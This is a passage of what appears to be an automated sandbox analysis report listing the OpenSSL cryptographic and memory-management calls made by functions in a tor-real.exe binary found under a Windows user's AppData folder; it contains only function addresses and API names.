                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0A4E24 CRYPTO_free,CRYPTO_free,memcmp,25_2_6C0A4E24
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0BCE30 CRYPTO_THREAD_write_lock,OPENSSL_LH_retrieve,OPENSSL_LH_delete,CRYPTO_THREAD_unlock,CRYPTO_THREAD_unlock,25_2_6C0BCE30
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0B6E60 strlen,CRYPTO_malloc,strcpy,CRYPTO_clear_free,25_2_6C0B6E60
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0AEE66 CRYPTO_realloc,CRYPTO_realloc,memset,25_2_6C0AEE66
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0A0E80 CRYPTO_zalloc,25_2_6C0A0E80
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0D4EA7 CRYPTO_free,EVP_MD_CTX_free,BUF_reverse,25_2_6C0D4EA7
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0A0EE0 EVP_PKEY_free,EVP_PKEY_free,CRYPTO_free,OPENSSL_sk_pop_free,CRYPTO_free,CRYPTO_clear_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_clear_free,25_2_6C0A0EE0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0DEF43 CRYPTO_clear_free,EVP_PKEY_free,25_2_6C0DEF43
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C094F70 CRYPTO_free,25_2_6C094F70
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0DEF89 CRYPTO_clear_free,25_2_6C0DEF89
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0E4FA7 CRYPTO_malloc,25_2_6C0E4FA7
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0D4FA6 CRYPTO_free,EVP_MD_CTX_free,RSA_pkey_ctx_ctrl,RSA_pkey_ctx_ctrl,25_2_6C0D4FA6
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C09CFC4 EVP_MD_CTX_md,EVP_MD_CTX_md,EVP_MD_size,CRYPTO_memcmp,EVP_CIPHER_CTX_cipher,EVP_CIPHER_flags,EVP_CIPHER_CTX_cipher,EVP_CIPHER_flags,25_2_6C09CFC4
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C09A800 CRYPTO_malloc,CRYPTO_free,CRYPTO_malloc,25_2_6C09A800
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0BE844 CRYPTO_free,25_2_6C0BE844
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0BC860 memcmp,time,CRYPTO_THREAD_write_lock,OPENSSL_LH_retrieve,OPENSSL_LH_delete,CRYPTO_THREAD_unlock,CRYPTO_THREAD_unlock,__stack_chk_fail,25_2_6C0BC860
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0C28A8 CRYPTO_free,CRYPTO_memdup,strcmp,strlen,OPENSSL_cleanse,25_2_6C0C28A8
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0E48B0 CRYPTO_malloc,CRYPTO_free,CRYPTO_free,ERR_put_error,25_2_6C0E48B0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0BE8E5 CRYPTO_free,CRYPTO_strdup,CRYPTO_free,__stack_chk_fail,25_2_6C0BE8E5
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0E28F0 CRYPTO_malloc,CRYPTO_free,CRYPTO_free,ERR_put_error,ERR_put_error,25_2_6C0E28F0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0CC919 BN_num_bits,BN_bn2bin,CRYPTO_free,CRYPTO_strdup,25_2_6C0CC919
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0C0949 OPENSSL_cleanse,OPENSSL_cleanse,EVP_PKEY_free,EVP_MD_CTX_free,EVP_DigestInit_ex,EVP_DigestUpdate,EVP_DigestFinal_ex,EVP_PKEY_new_raw_private_key,EVP_DigestSignInit,EVP_DigestUpdate,EVP_DigestSignFinal,CRYPTO_memcmp,25_2_6C0C0949
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0BA940 CRYPTO_realloc,memcpy,ERR_put_error,ERR_put_error,ERR_put_error,ERR_put_error,ERR_put_error,25_2_6C0BA940
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C09A946 CRYPTO_free,CRYPTO_malloc,25_2_6C09A946
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C09696C CRYPTO_free,CRYPTO_free,25_2_6C09696C
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0D2960 CRYPTO_free,CRYPTO_free,CRYPTO_free,EVP_CIPHER_CTX_free,EVP_MD_CTX_free,memcpy,CRYPTO_free,CRYPTO_free,CRYPTO_free,EVP_CIPHER_CTX_free,EVP_MD_CTX_free,__stack_chk_fail,25_2_6C0D2960
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0E4974 CRYPTO_free,25_2_6C0E4974
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0969D0 CRYPTO_free,25_2_6C0969D0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0D89E0 CRYPTO_memcmp,memcpy,memcpy,__stack_chk_fail,25_2_6C0D89E0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0D49F0 __stack_chk_fail,__stack_chk_fail,CRYPTO_free,EVP_MD_CTX_free,EVP_MD_CTX_new,EVP_PKEY_size,CRYPTO_malloc,EVP_DigestSignInit,EVP_DigestSign,CRYPTO_free,EVP_MD_CTX_free,BUF_reverse,EVP_DigestUpdate,EVP_MD_CTX_ctrl,EVP_DigestSignFinal,RSA_pkey_ctx_ctrl,RSA_pkey_ctx_ctrl,__stack_chk_fail,25_2_6C0D49F0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0E49F0 CRYPTO_malloc,CRYPTO_free,CRYPTO_malloc,CRYPTO_free,CRYPTO_free,CRYPTO_free,ERR_put_error,25_2_6C0E49F0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0C2A0C CRYPTO_memcmp,25_2_6C0C2A0C
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0B6A2B CRYPTO_malloc,CRYPTO_free,ERR_put_error,25_2_6C0B6A2B
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0CEA50 OPENSSL_sk_new_null,X509_free,OPENSSL_sk_pop_free,d2i_X509,CRYPTO_free,OPENSSL_sk_push,ERR_clear_error,OPENSSL_sk_value,X509_get0_pubkey,EVP_PKEY_missing_parameters,X509_free,X509_up_ref,__stack_chk_fail,CRYPTO_free,25_2_6C0CEA50
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0B2A73 ERR_put_error,CRYPTO_free,25_2_6C0B2A73
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0C6A8B CRYPTO_free,CRYPTO_free,CRYPTO_memdup,25_2_6C0C6A8B
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C094A80 CRYPTO_zalloc,CRYPTO_free,ERR_put_error,BUF_MEM_grow,25_2_6C094A80
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0C4A86 CRYPTO_free,CRYPTO_memdup,25_2_6C0C4A86
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0E4AEC CRYPTO_malloc,CRYPTO_free,25_2_6C0E4AEC
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0ACAE0 OPENSSL_init_crypto,CRYPTO_THREAD_run_once,ERR_put_error,CRYPTO_THREAD_run_once,CRYPTO_THREAD_run_once,25_2_6C0ACAE0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C096B00 CRYPTO_free,25_2_6C096B00
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0B4B18 CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_put_error,25_2_6C0B4B18
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0ACB24 CRYPTO_THREAD_run_once,25_2_6C0ACB24
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0BAB3C CRYPTO_realloc,memcpy,ERR_put_error,ERR_put_error,ERR_put_error,ERR_put_error,25_2_6C0BAB3C
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0CEB59 X509_free,OPENSSL_sk_pop_free,d2i_X509,CRYPTO_free,OPENSSL_sk_push,ERR_clear_error,OPENSSL_sk_value,X509_get0_pubkey,EVP_PKEY_missing_parameters,X509_free,X509_up_ref,25_2_6C0CEB59
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C09AB50 CRYPTO_free,25_2_6C09AB50
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0ACBB4 CRYPTO_THREAD_run_once,25_2_6C0ACBB4
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0AEBEB CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_put_error,25_2_6C0AEBEB
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0ACBE7 CRYPTO_THREAD_run_once,25_2_6C0ACBE7
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0AA419 CRYPTO_free,CRYPTO_mem_ctrl,ERR_put_error,25_2_6C0AA419
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0AE421 CRYPTO_free,CRYPTO_free,ERR_put_error,25_2_6C0AE421
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0B2426 CRYPTO_memdup,CRYPTO_free,CRYPTO_free,ERR_put_error,25_2_6C0B2426
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C096440 CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,25_2_6C096440
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C096453 CRYPTO_free,CRYPTO_free,25_2_6C096453
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0C2469 CRYPTO_free,25_2_6C0C2469
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0D0460 CRYPTO_clear_free,25_2_6C0D0460
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0B247C CRYPTO_memdup,CRYPTO_free,25_2_6C0B247C
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0964AC CRYPTO_free,CRYPTO_free,25_2_6C0964AC
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0944C0 CRYPTO_free,25_2_6C0944C0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0CE4D6 CRYPTO_free,25_2_6C0CE4D6
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0B24D7 CRYPTO_free,25_2_6C0B24D7
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0BC500 memcpy,CRYPTO_THREAD_read_lock,OPENSSL_LH_retrieve,CRYPTO_THREAD_unlock,CRYPTO_THREAD_unlock,__stack_chk_fail,25_2_6C0BC500
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C096504 CRYPTO_free,CRYPTO_free,25_2_6C096504
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C09453C CRYPTO_free,25_2_6C09453C
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0D0533 CRYPTO_clear_free,25_2_6C0D0533
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0D455B CRYPTO_free,CRYPTO_free,CRYPTO_free,25_2_6C0D455B
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0CC55B X509_get0_pubkey,EVP_PKEY_get0_RSA,CRYPTO_malloc,RAND_bytes,EVP_PKEY_CTX_new,EVP_PKEY_encrypt_init,EVP_PKEY_encrypt,EVP_PKEY_encrypt,EVP_PKEY_CTX_free,25_2_6C0CC55B
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0AC590 CRYPTO_free,CRYPTO_free,OPENSSL_sk_pop_free,CRYPTO_free,25_2_6C0AC590
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C09A5A0 CRYPTO_free,25_2_6C09A5A0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0965A0 CRYPTO_free,25_2_6C0965A0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0D25A0 CRYPTO_free,CRYPTO_free,CRYPTO_free,EVP_CIPHER_CTX_free,EVP_MD_CTX_free,CRYPTO_free,__stack_chk_fail,CRYPTO_free,CRYPTO_free,CRYPTO_free,EVP_CIPHER_CTX_free,EVP_MD_CTX_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,memcpy,EVP_CIPHER_CTX_free,EVP_MD_CTX_free,EVP_CIPHER_CTX_free,EVP_MD_CTX_free,25_2_6C0D25A0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C09A61C CRYPTO_malloc,malloc,25_2_6C09A61C
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0AC640 CRYPTO_strdup,CRYPTO_free,strlen,CRYPTO_free,25_2_6C0AC640
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0DA647 CRYPTO_malloc,EVP_CIPHER_CTX_new,HMAC_CTX_new,EVP_CIPHER_CTX_iv_length,EVP_EncryptUpdate,CRYPTO_free,EVP_CIPHER_CTX_free,HMAC_CTX_free,EVP_MD_size,RAND_bytes,time,CRYPTO_free,CRYPTO_memdup,EVP_aes_256_cbc,EVP_CIPHER_iv_length,RAND_bytes,EVP_EncryptInit_ex,EVP_sha256,HMAC_Init_ex,CRYPTO_free,EVP_CIPHER_CTX_free,HMAC_CTX_free,__stack_chk_fail,EVP_EncryptFinal,HMAC_Update,HMAC_Final,25_2_6C0DA647
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0C0640 EVP_MD_size,EVP_MD_CTX_new,EVP_DigestInit_ex,EVP_DigestFinal_ex,OPENSSL_cleanse,OPENSSL_cleanse,EVP_PKEY_free,EVP_MD_CTX_free,EVP_DigestInit_ex,EVP_DigestUpdate,EVP_DigestFinal_ex,EVP_PKEY_new_raw_private_key,EVP_DigestSignInit,EVP_DigestUpdate,EVP_DigestSignFinal,CRYPTO_memcmp,BIO_ctrl,EVP_DigestUpdate,__stack_chk_fail,25_2_6C0C0640
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C094670 CRYPTO_zalloc,ERR_put_error,BUF_MEM_grow,BUF_MEM_grow,25_2_6C094670
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0AE670 EVP_MD_size,CRYPTO_zalloc,CRYPTO_malloc,memcpy,d2i_X509,X509_get0_pubkey,OPENSSL_sk_push,ERR_put_error,X509_free,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_put_error,ERR_put_error,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_put_error,ERR_put_error,ERR_put_error,ERR_put_error,d2i_PUBKEY,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_insert,ERR_put_error,ERR_put_error,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_put_error,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_put_error,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,EVP_PKEY_free,X509_free,OPENSSL_sk_new_null,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,__stack_chk_fail,ERR_put_error,CRYPTO_realloc,CRYPTO_realloc,memset,ERR_put_error,25_2_6C0AE670
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0A4670 ASN1_item_d2i,ERR_put_error,ASN1_item_free,ASN1_item_free,ERR_put_error,memcpy,memcpy,X509_free,memcpy,CRYPTO_free,CRYPTO_strndup,CRYPTO_free,CRYPTO_strndup,CRYPTO_free,CRYPTO_strndup,CRYPTO_free,CRYPTO_free,CRYPTO_strndup,CRYPTO_free,CRYPTO_free,ASN1_item_free,ASN1_item_free,ERR_put_error,time,ERR_put_error,__stack_chk_fail,25_2_6C0A4670
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0B2675 CRYPTO_zalloc,CRYPTO_THREAD_lock_new,OPENSSL_LH_new,X509_STORE_new,CTLOG_STORE_new,OPENSSL_sk_num,X509_VERIFY_PARAM_new,EVP_get_digestbyname,EVP_get_digestbyname,OPENSSL_sk_new_null,OPENSSL_sk_new_null,CRYPTO_new_ex_data,CRYPTO_secure_zalloc,RAND_bytes,RAND_priv_bytes,ERR_put_error,ERR_put_error,ERR_put_error,ERR_put_error,ERR_put_error,CRYPTO_free,ERR_put_error,ERR_put_error,RAND_priv_bytes,RAND_priv_bytes,ERR_put_error,ERR_put_error,25_2_6C0B2675
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0BC690 CRYPTO_THREAD_write_lock,OPENSSL_LH_retrieve,OPENSSL_LH_delete,CRYPTO_THREAD_unlock,CRYPTO_THREAD_unlock,25_2_6C0BC690
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0AC6A3 CRYPTO_free,25_2_6C0AC6A3
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0C26A3 CRYPTO_free,CRYPTO_memdup,strcmp,strlen,OPENSSL_cleanse,CRYPTO_memcmp,OPENSSL_cleanse,__stack_chk_fail,memset,EVP_MD_size,__stack_chk_fail,time,EVP_MD_size,EVP_MD_size,__stack_chk_fail,25_2_6C0C26A3
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0BE6B8 CRYPTO_free,25_2_6C0BE6B8
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0C46BB EVP_PKEY_new,EVP_PKEY_copy_parameters,EVP_PKEY_set1_tls_encodedpoint,EVP_PKEY_free,EVP_PKEY_free,EVP_PKEY_free,__stack_chk_fail,CRYPTO_free,CRYPTO_memdup,25_2_6C0C46BB
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C09A6B0 CRYPTO_free,CRYPTO_malloc,25_2_6C09A6B0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0BC6B7 CRYPTO_THREAD_write_lock,OPENSSL_LH_retrieve,OPENSSL_LH_delete,CRYPTO_THREAD_unlock,25_2_6C0BC6B7
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0966E0 CRYPTO_malloc,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,25_2_6C0966E0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0E26E0 CRYPTO_free,25_2_6C0E26E0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C096713 CRYPTO_malloc,CRYPTO_free,CRYPTO_free,25_2_6C096713
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0BE710 CRYPTO_free,25_2_6C0BE710
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0D2747 CRYPTO_free,CRYPTO_free,CRYPTO_free,25_2_6C0D2747
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0BE760 CRYPTO_free,CRYPTO_free,25_2_6C0BE760
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0BC7A1 CRYPTO_THREAD_unlock,25_2_6C0BC7A1
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0BE7B1 CRYPTO_free,25_2_6C0BE7B1
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0BC7D9 CRYPTO_THREAD_unlock,25_2_6C0BC7D9
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0A47E1 memcpy,memcpy,X509_free,memcpy,CRYPTO_free,CRYPTO_strndup,CRYPTO_free,CRYPTO_strndup,CRYPTO_free,CRYPTO_strndup,CRYPTO_free,CRYPTO_free,CRYPTO_strndup,CRYPTO_free,CRYPTO_free,ASN1_item_free,25_2_6C0A47E1
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0D87E0 CRYPTO_malloc,memcpy,25_2_6C0D87E0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0BE7F7 CRYPTO_free,25_2_6C0BE7F7
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0AA006 CRYPTO_malloc,ERR_put_error,25_2_6C0AA006
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0CC000 __stack_chk_fail,X509_get0_pubkey,EVP_PKEY_get0_RSA,CRYPTO_malloc,RAND_bytes,EVP_PKEY_CTX_new,EVP_PKEY_encrypt_init,EVP_PKEY_encrypt,EVP_PKEY_encrypt,EVP_PKEY_CTX_free,EVP_PKEY_get0_DH,DH_get0_key,BN_num_bits,BN_bn2bin,EVP_PKEY_free,CRYPTO_clear_free,EVP_PKEY_CTX_free,EVP_PKEY_free,CRYPTO_free,EVP_PKEY_get1_tls_encodedpoint,CRYPTO_free,EVP_PKEY_free,25_2_6C0CC000
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0DE01B CRYPTO_memdup,25_2_6C0DE01B
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0AC050 CRYPTO_zalloc,25_2_6C0AC050
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0DE0C7 CRYPTO_free,CRYPTO_memdup,25_2_6C0DE0C7
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0EA0C0 SRP_Verify_B_mod_N,SRP_Calc_u,SRP_Calc_x,SRP_Calc_client_key,BN_num_bits,CRYPTO_malloc,BN_bn2bin,BN_clear_free,BN_clear_free,strlen,CRYPTO_clear_free,BN_clear_free,BN_clear_free,BN_clear_free,25_2_6C0EA0C0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0AE0F2 CRYPTO_THREAD_write_lock,CRYPTO_THREAD_unlock,25_2_6C0AE0F2
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0BC0F0 CRYPTO_THREAD_write_lock,OPENSSL_LH_insert,CRYPTO_THREAD_unlock,OPENSSL_LH_retrieve,OPENSSL_LH_delete,OPENSSL_LH_retrieve,25_2_6C0BC0F0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0B4120 OPENSSL_sk_num,OPENSSL_sk_num,OPENSSL_sk_pop_free,OPENSSL_sk_pop_free,X509_free,OPENSSL_sk_new_reserve,OPENSSL_sk_value,EVP_MD_size,CRYPTO_zalloc,CRYPTO_malloc,memcpy,d2i_X509,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_put_error,d2i_PUBKEY,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_insert,X509_VERIFY_PARAM_get_depth,X509_VERIFY_PARAM_set_depth,CRYPTO_dup_ex_data,EVP_CIPHER_CTX_free,EVP_CIPHER_CTX_free,COMP_CTX_free,COMP_CTX_free,EVP_MD_CTX_free,EVP_MD_CTX_free,X509_VERIFY_PARAM_inherit,OPENSSL_sk_dup,OPENSSL_sk_dup,ERR_put_error,ERR_put_error,ERR_put_error,memcpy,ERR_put_error,ERR_put_error,ERR_put_error,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_put_error,ERR_put_error,ERR_put_error,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_put_error,X509_get0_pubkey,OPENSSL_sk_push,ERR_put_error,X509_free,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_put_error,EVP_PKEY_free,X509_free,OPENSSL_sk_new_null,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,__stack_chk_fail,EVP_CIPHER_CTX_free,EVP_CIPHER_CTX_free,COMP_CTX_free,COMP_CTX_free,25_2_6C0B4120
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0AE138 CRYPTO_THREAD_write_lock,CRYPTO_THREAD_unlock,25_2_6C0AE138
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0AE180 memcpy,CRYPTO_THREAD_read_lock,OPENSSL_LH_retrieve,CRYPTO_THREAD_unlock,__stack_chk_fail,X509_VERIFY_PARAM_set_purpose,25_2_6C0AE180
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0CE1A8 CRYPTO_free,25_2_6C0CE1A8
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0D41D0 __stack_chk_fail,CRYPTO_malloc,memcpy,CRYPTO_malloc,ERR_put_error,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,ERR_put_error,EVP_CIPHER_CTX_free,EVP_MD_CTX_free,__stack_chk_fail,25_2_6C0D41D0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0C2234 EVP_PKEY_get1_tls_encodedpoint,CRYPTO_free,CRYPTO_free,EVP_PKEY_free,__stack_chk_fail,CRYPTO_free,25_2_6C0C2234
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0AA230 CRYPTO_THREAD_run_once,25_2_6C0AA230
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0C6230 memchr,CRYPTO_free,CRYPTO_strndup,25_2_6C0C6230
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C092236 CRYPTO_zalloc,CRYPTO_free,25_2_6C092236
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0CE246 CRYPTO_free,25_2_6C0CE246
